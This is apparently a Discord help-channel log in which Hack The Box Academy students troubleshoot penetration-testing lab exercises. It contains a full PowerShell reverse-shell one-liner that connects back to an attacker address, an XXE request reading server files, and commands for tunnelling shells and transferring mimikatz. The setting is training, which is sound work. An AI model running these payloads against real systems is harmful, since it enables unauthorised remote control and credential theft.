#modules

Am i missing something ?

Got it usint [grep] and filtering 'L' words 🙂 @storm stratus

I know there is a typo but i thought it was wierd for the flag to be HBT and not HTB

Try and run powershell as administrator

im just wondering if anyone has similar results

on - common services- easy lab- some people say that they found the user just using nmap. Can someone show me a PoC

Anyone else have issues with the academy dashboard not updating progress for the past few days? I've completed a couple module questions but neither the progress bar for the module or the percentage completed for the path has updated.

it updates for me

Hm, weird.

Make sure you're pressing the finish button on each page, partially completing a section will not update progress

That was it, thanks.

Hi, does anyone complete advanced csrf & xss skill assessment?
I have promoted to moderator, then I am looking for flag api endpoint.
but unfortunately there are no signs of finding one at all...
I would appreciate it if someone give me some hints.

Edit:
finally got flag... It was great module.

Hi, did anyone else face the problem with bloodhound when uploading of findings from sharphound it's stuck at 0 percent?

that happens when you use a new sharphound ingestor on a old bloodhound version. For some reason the latest bloodhound you can dl is version 4.x and the latest sharphound is for bloodhound 5.x

so either upgrade your bloodhound or downgrade your sharphound

Compromise DC01 and submit the value of the flag file at C:\Users\Administrator\Desktop\flag.txt
Hello to everyone,
I am stuck on the last exercise of the ADCS skills assessment. DEV01 has been compromised and the password of jimmy’s account too. But, I am not able to compromise DC01.

With this new credentials I found that this user belongs to a group that “has dangerous permissions”. But I am not able to execute the commands from the Linux machine.
I have read that @F4Zero has made this question before and I have searched on google for the error of "[*] Requesting certificate via RPC
[-] Failed to get dynamic TCP endpoint for CertSvc
[-] Got error: 'NoneType' object has no attribute 'request'
[-] Use -debug to print a stacktrace"
Could anyone give me a hint on how to continue?

The weird thing is that it worked for me a couple days ago, and without changing any versions of each, it just doesn't anymore

if you run sharphound one of the first lines should be something like "this version works for bloodhound x.y", check that it doesn't say 5.0 if you use the older bloodhound

I had this problem a few times

Yep, it does say that for some reason, weird. How can I upgrade to bloodhound 5.x? I downloaded it using apt after updating all the repos and it still doesn't the right version it seems

https://github.com/SpecterOps/BloodHound has docker instructions

I ended up downgrading my sharphound so it would work with 4.x instead :X

Thanks! i'll give that a try, and in the worst case I would downgrade sharphound

Hello, am I the only one experiencing significant slowness with connections to different machines? The RDP is completely bugging, SSH as well, etc.

Has anyone online/available completed the ADCS module by chance? May I DM? Stuck on ESC11 and in the last question of the skills assessment

Can I dm you for a sec?

Message support: but have you tried using the tcp vpn pack, or changing vpn region?

Yes, it's the same

sure

Working through the Nmap module. The NSE page wants me to find a flag from one of the services using NSE.

I found the HTB{} flag but it’s not accepting it as the answer?

Tried removing spaces at the end?

No spaces anywhere

Don't run around the system as root

Sometimes some weird 0-width characters get copied

Dears I'm in PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP
I made all what I learn in this module but when tried to get RDP on jason machine this error occurred on proxifire
[02.15 07:28:33] mstsc.exe (4528) *64 - 172.16.6.155:3389 error : Could not connect to proxy 127.0.0.1(127.0.0.1):1080 - connection attempt failed with error 10061

Or xfreerdp

• I found giving password when promted useful for some windows machines

So does remnina

No

Just ask your question, don't ask to ask

It has been exactly 5 minutes since I've been waiting for a response, and I still haven't received any reply.

Then I'd say reread the module/sections

Restart the lab then

I've restarted the entire lab 3 times now...

This is gonna sound dumb: are you connected to the vpn?

Can't stress this enough.

Yes .. 😫

Other question: are you by any chance running the pwnbox at the same time?

Guys you know when you RDP into a target and then you SSH from there. Paste doesn't seem to work and I just sort of accepted it. I am gonna lose my mind if I have to type out one more command by hand. There has to be a way

No, the pwnbox is turned off; I'm doing the lab on my machine.

Xfreerdp has +clipboard option

Oh my days, for real

I'm ashamed to even admit how many times I've been pulling my hair out and only after a good half hour or so do I realize I never ran openvpn

How many tun interfaces do you have ip a

It’s ok we all make mistakes with that lol.

I switched to remina cause it kept dropping but I'll switch back

Thank you

Just 1 tunnel, can I DM you?

No

🙃

At this point contact website support then

I'm not staff/support

Oh lord! I just realised right click pastes in remina

What a silly sausage I am 🌭

It seems to be working for now, albeit with a lot of slowness.
I have another question, why does this command from the course not work on the box even after disabling Windows' antivirus?
I run nc -lvnp 443 on my machine, then executed this command on Windows VM to get a reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<my-tun-ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

I get an output with only errors.

Did you replace <my-tun-ip> (I'm assuming yes)

yes

Gotta make sure, you didn't include the brackets either yeah?

no i use like this '1.1.1.1'

Dose anyone to help ?

Try using a powershell one from revshells site

I tried the 3 PowerShell reverse shells available on the ||PayloadsAllTheThings|| GitHub, but none of them worked. Then I tested a reverse shell with ||Nishang||, and it worked. I don't know why the others didn't work.

I was more referring to revshells.com

Oh okay, I didn't have the information.

Hi, I'm a complete beginner when it comes to hacking or web exploitation. I was looking at the bug bounty path and was wondering how anyone's experience with it was? Were you able to get into bug bounties straight after doing the course and exam or is it atleast a very good starting point

Would someone be so kind as to assist me here please. I've spent hours on the last flag of PTT in Linux. It's supposed to be in share \DC01\linux01 and they give you a snippet of it. Presumably to search. Without giving too much away, I've utilised the description and tried different ways of it but never get a result other than the flag that I don't need. I looked for a hint and someone said to get in the same way as the Julio flag in the same sort of location. I just don't understand how to impersonate linux01 I guess. I've got root on linux01 machine. And about half a brain cell left.

It's the passwords module btw

If this problem statement is poor then let me know. I'm scared of spoiling it

Hi everybody! i'm stuck in Cmd vs Powershell module, in the last question of the skill assessment! i logged in as a user 10 and tried Get-WinEvent command, but i tried all the users i get, and everytime my answer is wrong!

I havent taken the bug bounty course yet but going through the pen testing course I can say that HTB has done an excellent job teaching the materiel so I would say that course plus some extra learning along with it is enough to get into bug bounties

you can impersonate that user with a keytab

Ah yes I bet I never tried that. I got lost. Thanks I'll let you know how I get on

I see thank you!

Can someone help me with burpsuite proxy problem

I found the problem! I was running the command as user10, but question asked to check in Domain Controller host!

oops

I tried implementing the command "plink -ssh -D 9050 admin@172.16.6.100
" ... not sure if that worked.

https://academy.hackthebox.com/module/143/section/1278

"Submit the contents of the flag.txt file on the Administrator desktop on MS01 "

I'm sorry but I still don't get it. Is linux01 a user?

Is this the question youre stuck on?

It's the last one of the non bonus questions

I'm just gonna try a kt from the user that got me root

Finishing up this module too. If I find it Ill give you a hand

Maybe I lost track of what I've tried

Okay that wasn't it

yeah,

did you find the find the keytab files?

I believe so, I have some hashes now and the service principal seems to be LINUX01

Hopefully I'm on the right track

Im assuming I have to pivot and RDP into the machine correcT?

I think you just SSH from place to place

is there still connectivity issues

its not "is" there connectivity issues, its "how bad" are the connectivity issues

right now connectivity seems to be ok lol

yea well there was connectivity issues yesterday and still have an issue periodic connectivity with the labs

idk if anyone else is expereincing it

I had connectivity issues yesterday too using browser vm

so far so good today

alright coulda just been a hickup today

I always assume theres connectivity issues which is why I reword it as "how bad" is the issues lol

ah, for a particular part im on i have to ssh to one of the machines, and that machine would go unresponsive for like 5 minutes then let me type again

none of it on the pwn box

I dont think you have to extract the hashes from the keytab, once you acquire it, just impersonate the user with kinit

If it continues try disconnecting and reconnecting the vpn. that usually fixes it for me when using local VM

Maybe I don't have the right kt. Tried kinit. Both with and without $. I better try again tomorrow. Had a good 11 hours today

Thanks for your help!

This is more of a general question I've had during the AD Enumeration & Attacks module, but most of the time the modules have gotten us to RDP into hosts to locate flags, the last two questions have just left it vague and told us to retrieve the flags in a certain area. What's the most efficient way to explore the directory of a compromised Windows host/user? I used psexec.py but I was wondering what else you could use to just get a shell and explore the directories

I want to switch to this field, can someone with experience give me suggestions?

Is anyone able to provide some insight on Q3 for Web Server Pivoting with Rpivot. "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." I've got my pivot set up and see 2 machines . Both have port 80 open but both are default apache pages. Not sure where i'm supposed to grab the flag from.

Anyone i can dm for "AD Enumeration & Attacks - Skills Assessment Part II"

im stuck. i have all the users, + a valid cred. but cant seem to be able to get to a shell

what do i start with

which question you on?

after the cleartext password

Submit the contents of the C:\flag.txt file on MS01.

there isnt rdp,winrm,psexec or anything it seems like

what are you trying?

have you checked did you double check?

i mean, i ran a intensive nmap scan on it

might have been very tired

always double tap with nmap

dont tell me its on a different port

nah

all defaults

but than xfreerdp should default to the rdp port

if that is what you are talking about tho

I am on the same section just a few steps ahead

nice, i think the rest should be fair enough i just cant get the shell so

been stuck on that for a little time

do a double check do not do intensive

just the barebones will be fine

oh wait

i am guessing this is a ||mssql||

https://tenor.com/vnn9.gif

do you know how to set up a reverse shell with meterpreter on reverse shell

just ligolo-ng

I did

but my listener is dying

ah

is it more stable on nc?

its a windows victim

ye, but that wouldnt matter.

dunno how to set up on cmd

should I send nc.exe

just use a powershell shell and set up nc on your attack host

and use ligolo to route it to you

That's a T2 module if it's for the one mentioned above

https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b

Please keep spoilers for modules > T0 out of public chat.

there was no spoiler only a meterpreter session shot

Fair, sorry then. My eyes glanced over it and I acted.

Poor tired eyes.

i feel yah

just got off a plane and just wanna sleep. But my covers are in the dryer

but any help on the meterpreter shell?

i told you

why is it dying?

most likely because the connection is poor. Setup double pivioting and this issue will be no more

how do I do that?

wait are you on the host?

how many networks deep are you?

just a single hop

ok, then it should be fine

still its dying

i put the hop address in lhost

and forward the port in ligolo

run this command in ligolo-ng

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

And send the reverse shell too the victim you are on on port 11601

and setup a local nc on 11601 on your attacker machine

evil-winrm is good, if I just want to run a quick command, netexec. but usually it's whatever that's available

I dont think I've used netexec yet so I'll try to start using that more

just don't use meterpreter and use tcp vpn if you aren't

whats the difference between netexec and psexec?

I am guessing that psexec is based on powershell and netexec uses some "net" thing?

alright

hands down best tool for AD

I never get the chance to use meterpreter so I think that I am missing on something big thats y I try to use it

Netexec is a suite of tools, (crackmapexec)

Ah okay that makes sense so I have used it

psexec is an impacket tool to get a shell, netexec is a swiss army knife for pretty much anything windows/AD related

are there any other documentation or videos you recommend other the official one?

oh yeah i've heard about this. Cool

the wiki coverts pretty much everything and it's all you need, htba has a cme module but it slightly outdated

Netexec is literally cme, but better

oh ok then I will try to use it from now

That's pretty awesome cause cme is pretty great already I find

There's a whole thing with the creator and the contributing devs that resulted in the devs forking and basically making their own tool

Their Wiki is pretty in-depth too which I always appreciate, gonna try to use netexec as much as possible during the AD assessment

Hello do you have a idea why it is not okay for this plz ? course : https://academy.hackthebox.com/module/158/section/1428

https://github.com/byt3bl33d3r/CrackMapExec/discussions/801

you need to set lhost?

still no luck 😦 tried http-enum as well as curling the page (little support i found on the forms)

what am I suppossed to input on the Skill Assessment first task of Assembly , its been week since I have been trying to solve this,

#modules message

I tried that

I copy pasted the decoded values from the stack

it still did not work

should I copy it from bottom to top?

if you copied it from the stack then it's wrong, the xor'd value is in rdx , step through the instructions and copy after it's been xor'd

I copied it after its been xor'd

nvm I got it

WEB ATTACKS --> skill assesment --> got the admin password reset, accessed the admin login, event calender added, should XXE the adding of an event but i cant get flag.php

Anyone a nudge?

HTTP request:
|| POST /addEvent.php HTTP/1.1
Host: 94.237.62.195:32407
Content-Length: 214
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: http://94.237.62.195:32407
Referer: http://94.237.62.195:32407/event.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=icat5lf3fp9qf36sqjev41da30; uid=52
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///flag.php">
]>
<root>
<name>
&company;</name>
<details>&company;</details>
<date>3303-12-31</date>
</root>
||

Can read systemfiles but cant find flag.php

Look again in the module how you can read PHP files.

Here's a hot tip, wrap multi-line code in ``` makes it far easier to read

lhost where???

options

Thanks! I was looking for flag.php instead of /flag.php

i swear i tried that + put HTB{ } around it and said invalid both times...

i really new help with this question:
Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)
here:
https://academy.hackthebox.com/module/136/section/1291
i dont understand how am i suppose to get the dir for the uploads from upload.php source

Hi guys I am stuck on
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host
I have system on sql01 mimikatz cannot dcsync any hints?

I have 9 mins left please

Do you guys try to memorise commands? Or whenever you are trying to exploit something, you just look at your notes, google ..etc? Should I feel bad that I constantly need to check my notes regarding which command to use and how

I believe not just use them as much as you can and take notes. the more you use them the more you remember

thats what I do. but the problem is I get stuck a lot

do it the way you work best

i thought this for coding in general but after making program with 2k lines of code i just knew it all

its all up to knowledge and practice

if you miss 1 of them, be sure ur fucked

so its better to be 50/50 both

my pwnbox expired now I feel sad

;[

i am still stuck

they reduced the time for pwnbox I guess

cant u keep pressing extend for 6 hrs

im pretty sure there is button for bonus time

anyone? im really stuck on this

yes before it was 6hrs

😅

google

i tried i dont really know what to ask tbh

now not even 4 only target can spawn for 6hrs

use VM

dump everything

i feel way more comfortable on kali that pwnbox

the lag is too much

awwww, feel bad

read the code with the type command?

today i realised that i was trying to solve a challenge that i already solved and was trying to do it for 3 straight days

You should recognize when each tool can be used, but you don’t need to remember the syntax. There’s also this as a interactive cheatsheet https://github.com/Orange-Cyberdefense/arsenal

yo i got question for you since you are pro hacker

I guess I gotta make it my motto 'when stuck dump everything'

it worked

i'm not a pro hacker i am a noob

pretty much make it a part of your standard post exploit routine

how much time did it took you?

idc about my rank i just play on the weekends

cuz i was talking with another pro hacker when asking him for help after one of the challenges shattered my system and had to re install windows

the weekend boxes have no writeups so it's more fun

when everyone is clueless

run everthing in a vm, simple

you seem like the guy that puts "piece of cake" on insane level machines/challenges

yeah right u should've seen me doing thick client applications module

thought that the hard gamepwn cant hurt me lmao

i legit couldn't boot up my pc, like i was on the repair screen

had to do PC reset

now you know

ig so

super useful, thanks!

I am stucked on the question What is the FQDN of the host where the last octet ends with "x.x.x.203"? on https://academy.hackthebox.com/module/112/section/1069. Someone can give a nudge (thanks in advance)

You have to find all Zones

I tried with different wordlist without succees

and after some time of practicing in labs / boxes, some commands / syntax becomes second nature to you
for example whoami xd

henlo

henlo 👋

subdomains of subdomains

i am still very much stuck help🥲 (solved)

sorry if it's out of scope, out of curiosity, Is there a command for enumerating the FQDN by the IP?

you'd have to know the full ip

but anyway

the answer is gonna be in the format of subdomainB.subdomainA.inlanefreight.htb

i'd suggest starting with a zone transfer to start narrowing your search

Canonical studies

something is not working as expected

use a tool mentioned in the section

:P

ok thanks

but also zone transfer: don't rely on the wordlist until after starting with a basic zone transfer

because you can and will miss the important subdomain it's under

Hello need some help please with Footprinting hard assessment - I have the snmp string in the brackets but at a lost of what to do next. NMAP was completed for TCP and UDP ports. not sure what to do after running 161.

well if you have the snmp string: why not go for a walk

@soft cedar Thanks for the hint! I got there in the end.

Thank you! I should of asked a few days ago lol

np

im on skills assessement of shells and payloads section

and when i run the exploit ms17-010 on host 3 it wont create a session

is your lhost and lport right

^

well the lhost is basically the attacker IP so 100% right

that's not right

oh

check subnets

Hi! I need help on "Windows Privilege Escalation Skills Assessment - Part I" in the question "Find the password for the ldapadmin account somewhere on the system." This is the second question but I wasn't able to solve before escalating privilege (which was supposed to happen after getting the answer for the second question).
After becoming SYSTEM I was able to find the file with the ldapadmin password using the command "||findstr /SI /M "ldapadmin" *.xml *.ini *.txt||" . My question is: how was I suppose to get ldapadmin password before escalating privilege to SYSTEM?

<@&861185840277487616>

ello

got it

thank you :3

hello everyone

I just started, created acc and want to start learning, would you suggest me go into academy section or hacker section?

I saw both have different pricing that´s why I´m asking

if starting point from the hacker section is too hard try the academy. it depends where you're at on computers already prior to trying either.

both have free options, i'd say dip your toes in starting point (labs) and getting started path (academy) and see which one you like best

if you're absolute starter i suggest the academy so u can develop a methodology and communicate using terms that everyone knows.

I´m beginner into hacking and security things, so propably academy should be better

yeah it's good.

are you also using in academy virtual machines for teaching?

for teaching? no

i'm auditing it so i can tell people to try it or not

Because I saw on myself that when I´m learning something with using virtual machines it helps me more because I see on my own eyes how it works etc if you understand me

whats the best way to upload files from windows using powershell. I normally use rdp, smb, etc but those are not availabe now. I tried to use uploadserver I get 400 error Invoke-WebRequest -Uri http://172.16.7.240:5555/upload -Method POST -InFile C:\Users\Public\sam.save

Yeah I know but for me it´s better to ask here how it´s all about

they have a browser computer you can use called the pwnbox that's a vm u dont have to configure or maintain

you can use impacket-smbserver ?

rdp with /drive:x,.

then u can use the unc path like, //tsclient/x

yes but I know about those but I wanna do it the easy way

using http methods

use powershell to base64 encode the file then copy and paste it then

sam files are long

it's so easy tho

if we are talking about academy billing, which one you suggest? not sure if "+200" cubes per month is enough or nope

There are several Tier0 modules in the academy that you can try out for free

not with the rdp lag

what are your ambitions?

bro how do you navigate in that rdp panel in shells and payloads skills assessement?:(

its a nightmare to copy

Winter do everything for free b4 u spend a dime. See if the content is right for you. Starting point is free and there's tier 0 modules that r free too

for now? learn basics, how it works and understand what I need to understand, daily practising and putting few hours per day into it.

if you qualify as student then do the student subscription. Otherwise try a few modules with the free cubes. For non students that want to complete a full path the platinum subscription is the most bang for your buck

a worse quality version of the academy that's free exists on tryhackme.com but it's worse by farrrr

it's free though just leaves a lot to be desired and you'll find youself googling a lot

http works, you need the psupload script, google

ok

php upload??

yeah do the academy if u got a few hours to spare. idk if u kno but there are certs u can get at the end to validate your skills. are you interested in also getting certified ?

Yeah for sure I will but I want to know it before, to know how much should I prepare to lose for if (if I will)

Propably not

found it

if you dont want the cert just try the modules ala carte

that's what i do

ala carte?

yeah just pick what you like or wanna do/learn about

oh okey

but I saw I have just "60 cubes"

how do I use them? for what?

i'm doing all the modules tho :x

can I find it somewhere how I use them?

I will probably too

you use those to unlock modules

yeah the cubes unlock them and the subscription model gets you cubes. normally for ala cart is 100 cubes for 10$

tier 0 are free ie you get the 10 cubes back after you've completed them

winter do all the tier 0 ones see if u like the style b4 u buy it

oh I see

I now understand what are you talking about 😄

Okey, thank you for now

don't buy cubes ala carte lol, it's a big waste of money compared to the monthly subs

do you mean teaching or learning: two different verbs

learning, mistake

you can use the in-browser virtual machine for all academy content (in-fact all academy content is verifiably doable with it)

and are you paying right now for something?

it's preffered for most people to set up their own (and there is a setting up module)

how do i navigate to website in rdp in shells and payloads live engagement?

i can't find any browser

firefox

:)

I have plat monthly because I'm doing tier 3 & 4, but if you're a student get that, amazing value to unlock everything tier 2 and below for $8 a month

yeah use an edu email

also pay attention to the desktop 😉

whats your favorite t3/4 module after cpts path so far? I got 1.1k cubes left and dont know if I want to spend them on 2x game hacking or more AD stuff

once i land a new job i'm thinking about swapping

kerberos attacks, ADCS, the cme module is also very good. I also like the assembly module

did assembly already, that one was fun.

i have the game hacking one

PASSWORD ATTACKS >>> Protected Archives >>> Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.

In above question, I'm able to locate Notes.zip file and copy it to my attack machine, then get the hash, and finally use john to crack the hash using the mutated password list given in the module. But the cracked hash Im getting, seems to be not accepted as answer in that specific section. Can someone assist?

Thanks for the tip

it works like butter

yeah depends on your interests mostly, I've done all the AD related modules and most of them are great

are there legit people that look at hard machines and are like damn, thats so easy, like how to know if i can make it into cybersecurity

I am trying to transfer my mimikatz.exe file from my linux attack machine to the windows machine that I reverse shelled into and I am not sure how to use the smb share transfer method
sudo impacket-smbserver share -smb2support /tmp/smbshare

did you do bloodhound and powerview too? They seem a bit short for 1k cubes

sorry i just cant find firefox in desktop or in the menu idk maybe im just tired

it doesnt have a shortcut, you just gotta open the terminal and type "firefox"

bloodhound is 500, it's alright but not as strong as other tier 3 modules. powerview is the only AD module I didn't do. the ldap module is not good so I probably won't unlock powerview unless they update it

the Notes.zip contains a file that has the answer

ah yea was thinking of ldap then

HTB{..}

thanks man

the desktop comment was for the access_creds.txt

MANY people looked over it (myself included)

i did powerview. it's pretty good. i didnt think ldap was too bad either.

i use gc for cubes so

gc?

gift cards.

0 / 1 spawns left 🥲

I am saving for one can you please recommend one I was thinking of getting kerberos attacks

I am at 300 cubes

buy a subscription or get a vm

i dont have any of the newly released ones done yet i'm still catching up on the soc one then i'll do them.

maybe I will hop into the "Silver" just as a try for this month

the soc one is new to me and cpts too. i did just cbbh when it came out.

easier to get a vm tbh

you can set up your own vm for free if your pc is good enough

isn´t better to have it from them?

its better to learn how to use on your own

are you using own vm or their?

most people use their own

instead of the browser one

is there some + or -? instahead of paying

?

i use the browser one it's good if u dont want to use your own and already know how to set it up

not sure I quite understand what you're asking

extending lifetime of vm

if you use your own vm you don't have to worry about lifetimes

instance

i mean yeah; but you don't need a sub for that

and If something is "Silver" enough?

Silver monthly?

yes

Silver monthly is fine

¯_(ツ)_/¯

I probably don´t need "Gold"

when I´m just starting

it just depends on the pace you're going

also the information Security Fundamentals path is decent for beginners

is there any "Coupon Code"?

just asking

No, but keep an eye on our social channels. We do giveaways now and again.

bruh, it´s waste of time

Yes, I used zip2john to crack the zip file

and then got separate hash file to crack the hash

you cracked the password for the zip file

Can someone help me in the Nessus Skills Assessment?
I know it sounds easy, but the Nessus scan result doesn't show the accessible SMB shares.
I'm stumped I need help

did you unzip the Notes.zip file after getting the password?

kerberos and adcs

I wouldn't recommend it #858470491676737536 message

adcs is more fun in practice

irl

I guess kerberos is covered in ad enum and attack so I will go for adcs

uh anyone?
If not ill just resort to google

Oh yea I meant I mixed bloodhound and LDAP, not that I was considering spending 1k on LDAP yet. I’ll probably follow your recommendation and do adcs and Kerberos

Going through zephyr rn and having a good time and maybe I’ll get stuck and can gain new knowledge

kerberos coverts a lot more than ad enum and attack, don't get adcs if you aren't already familar with kerberos

are you looking at the right results?

:P it sounds dumb

I helped a few people with adcs when they haven't done kerberos attacks and it's painful to say the least

oh then kerberos it is do you have any other tier 3 module in mind to do before cuz I guess I will get only one unlock for free

but the Nessus pre-populated results should have everything and the preceding sections regarding using Nessus should be enough

this one, right?

I then tried to copy my mimikatz.exe onto my target machine with no luck using this command:

copy \10.10.15.235\usr\share\mimikatz\Win32\mimikatz.exe C:\

i forget if it's the authed or unauthed one

The crackmapexec module content looked juicy, it was really nice working with netexec in zephyr so far

Any advice on where im going wrong here? its showing a write error but i'm not attempting to right anywhere just open a CMD

you need to do \\ip\share\file for smb

in order of most recommeded imo, kerberos, adcs, relay, cme, dacl

it's been a minute since i've done it but the sections detailing how to use nessus should be enough to figure it out

Yes I unzipped

the relay module is also vey good @tranquil axle

okay then

Mmm relay

but also: are you running an smbshare on your root filesystem?

Maybe I’ll just sub for some more cubes and just do all 5 lol

where do you have the share running?

it's great but slightly outdated

Time to stack up on CPTS2 modules

Here... following instructions from my file transfer method module

sudo impacket-smbserver share -smb2support /tmp/smbshare

Bruh I found it but it was marked as INFO and not Low or Medium so it went right over my head, thank you for.. uh.. yeah

ok then you're fundamentally misunderstanding how smb works

the sharename is "share" given by the command, and the location you actually shared is "/tmp/smbshare"

which has 0 links to the current directory/file you're attempting to share

(unless you symlink it)

So when I type 'smbmap -H 10.129.105.110' and it doesn't return any shares...does that mean the share isn't on my target machine?

...

look where you're running the share

it's in the pwnbox

how would you creating a share on the pwnbox, create one on the target?

the share running on YOUR system is mapped to the /tmp/smbshare directory on your sytem

Hey guys, im doing WINDOWS PRIVILEGE ESCALATION section SeTakeOwnershipPrivilege, I want to know if im suppose to find a user that has SeTakeOwnershipPrivilege or the user hackthebox provided to rdp as would have the SeTakeOwnershipPrivilege. as the user they provided does not have SeTakeOwnershipPrivilege

run as admin

Hey, im doing thw windows event logging basics and im stuck " Build an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer."

I decision to hop into the silver subscription, since im using 2 devices and changing between them, saving time by doing vm 2 times

thank you sir

whatever works for you

And also I'm changing my OS systems pretty much

¯_(ツ)_/¯

going through the pivoting course, im currious is there a reason you would need to use tools like chisel instead of just using ligolo-ng? or is it just personal prefrence. I noticed neither HTB academy / offsec / TCM talk about the use of ligolo but its so easy

ligolo-ng is pretty new and you are learning some of the old methods

You should know how and why they work

are there instances where they would work and ligolo would not?

Chisel for example can be used to expose the port of a internal server to you, not sure how you’d do that with ligolo

not until the most recent update couple of weeks ago

also ligolo can't forward smb traffic, and ssh pivoting is simpler in the sense you don't have to drop a binary onto the host

are you talking about like basic port fowarding / sshuttle?

yes, there are times where you need to access a port that's only open on localhost, for example

awesome thanks, just trying to guage how much i deep i need to understand the tools

it's also good to learn how the tools work behind the scenes before moving to something that does it automatically

Ligolo is my goto, too, but sometimes you may need some of the others. And yes, it’s important to try and understand why

right , the 'tmp/smbshare' isn't on the pwn box ...the share would need to be on the target I think.

I was ignoring the previous command I used after I realized that the /tmp/share didn't exist that why I ran the smbmap command to see where the share on my target machine would possibly be located.

just host the smbshare in the directory you have the file you're trying to transfer

replace /tmp/smbshare with /usr/share/mimikatz/Win32

syntax being smbserver {sharename} {options} {filepath_on_system}

sirs, somebody can help me please? when i try to boot my .ovpn archive on kali the terminal break in this position of running:

2024-02-15 21:27:47 Timers: ping 10, ping-restart 120
2024-02-15 21:27:47 Protocol options: explicit-exit-notify 1

it's not broken, openvpn needs to be running for the connection, just open another terminal

it's just open another terminal and run the command again?

no, you're already connected, leave the openvpn instance in the background and do other things

sudo openvpn *.ovpn &

put the &

tks mr.s

but i'm having another problem to start the service, following the same:

"Error!
You must stop your active machine before spawning another one."

this error happens when i click on the button "Spawn Machine". Can you help me please?

i saw the message and i don't have 2 machines booted at the same time for now

What's your HTB username?

anonuserExe

i'm begginer sirs, i'm so sorry

goblin with the instant tech support

Please try again @graceful forge

ok @ocean night

btw read #welcome to get verified so you can see more of the server

i got it guys

Great

tks @next bronze and @ocean night

ok tks man

You're welcome

tbh if you scroll up just a little bit from that, you'd see that the Initialization Sequence Completed

meaning it's running

yeaaah @fathom pendant, i saw this, but tks for the message!

I prefer not to daemonise (putting & at the end) so I can quick kill the VPN if I need to switch due to performance issues

mmm that's ok, i got it

tks for your great support!

Hey yall I can not find the password for the support users on broken authentication. Do the users change every reset? My password list is 50 total lines long. I read the write up to the part Im on and I seem to be doing things correctly any advice?

is your fail string correct?

or are you sure you've got the right thing

also there shouldn't be a writeup for this module as it's tier 2

only tier 0 modules are allowed writeups

Failure Sring is "Invalid credentials" and time out is "Too many login failures"

by writeup do you mean the section content?

Nah fam some medium article

send link?

Ill DM you

you realize that I'm reporting the link for it breaking ToS yeah?

ToS?

yes: writeups are disallowed and break ToS for academy content

any writeup for content above tier 0 is explicitly not allowed lol

especially for skill assessments, which should be testing your knowledge regarding the content you've read up until that point

:P

Nice

Awe nah

So I'm on question 7 of AD Skills Assessment 2 and have an sql shell, but I'm not sure where to go from here. None of the cmd reverse shells are working with my netcat listener. Here is the output of the whoami /priv

My b'

what can you do with those privileges

Thanks @fathom pendant - identified and banned.

Not sure, that's what I'm wondering. I was trying to go for a one-liner reverse shell.

not sure? check your notes

what section

Yo did I just get banned?

Are you the author of that spoiler?

Nope

Then no

Oh well thats a relief

I could only find powershell on revshells.org, none of them worked.

I'm asking what can you do with those privileges

and did you set up the pivots correctly

Can we impersonate another user?

There are really no pivots so far

I'm just using mssqlclient.py with the previous question's credentials I found.

np the article isn't even well written tbh either

no wonder trying to follow it led nowhere for them :/

The "Moving On" section of the module doesn't give much to move on with, haha.

why not see if you can just read the desktop directly

It's not really much

also the mssql section of attacking common services really went over impersonation

Not there

Someone in the forum mention a printspoofer? I can't find that in the common services section.

So confused!!!

Taking a break, if anyone has some insight please DM me in the meantime.

printspoofer might be a method that allows a shell

¯_(ツ)_/¯

I'm not familiar with printspoofer, I'll have to check the section again. Not in my notes

it's not in common services but it is a common vulnerability

¯_(ツ)_/¯

printspoofer is mentioned in the module

they're talking about the AD module

yes

i'm just referring to something they said earlier regarding impersonation with the Common Services module comment

Can someone give me a hint on AD Skills Assessment 1, I feel like I'm missing something really basic but I'm starting to get frustrated. I don't know how much I can say but I'm still stuck on the first machine, got a rev shell, found the SPN mentioned in the second question but I don't know how to retrieve the ticket without any tools. I uploaded Mimikatz to the machine but I can't run it from this rev shell so I'm stuck

upload tools that can help you kerberoast

That's why I uploaded Mimikatz so I can extract the ticket from memory, but unable to run it from the rev shell apparently since I'm getting no output

mimikatz doesn't kerberoast

Broken Auth Skills Assement

No not directly, but it can be used to extract the ticket from memory. thought it would be simpler than compiling and uploading the more automated tool. But I'll give it a shot, I just don't know why that would run when mimikatz won't right now

extracting tickets from memory is different from kerberoasting, you still need to request the ticket first

Lol there is new line characters in my password

Yeah sorry should have clarified enumerated SPNs with setspn.exe and then used System.IdentityModel.Tokens.KerberosRequestorSecurityToken, hence why I was moving on to Mimikatz

Finally tackling the password labs HERE WE GO

Yup the other tool worked. Is there a reason mimikatz wasn't working, would like to know how to avoid wasting time in the future and just go straight to compiling the other tool

are you running it in the webshell?

usually mimikatz spawns another window

if you're trying to do some command shenanigans

No I hated the webshell so I used base64 encoded powershell rev shell I found on revshells, was trying to run it from there

ah okay that would make some sense

mimikatz isn't too friendly on non-ui shells

it doesn't

Got it, I'll make a note of that in the future

that's only if you pth or something, it's alwways inline on start

ye

mimikatz is neat though

it's still not an interactive shell, you need to run mimikatz in non interactive mode, something like

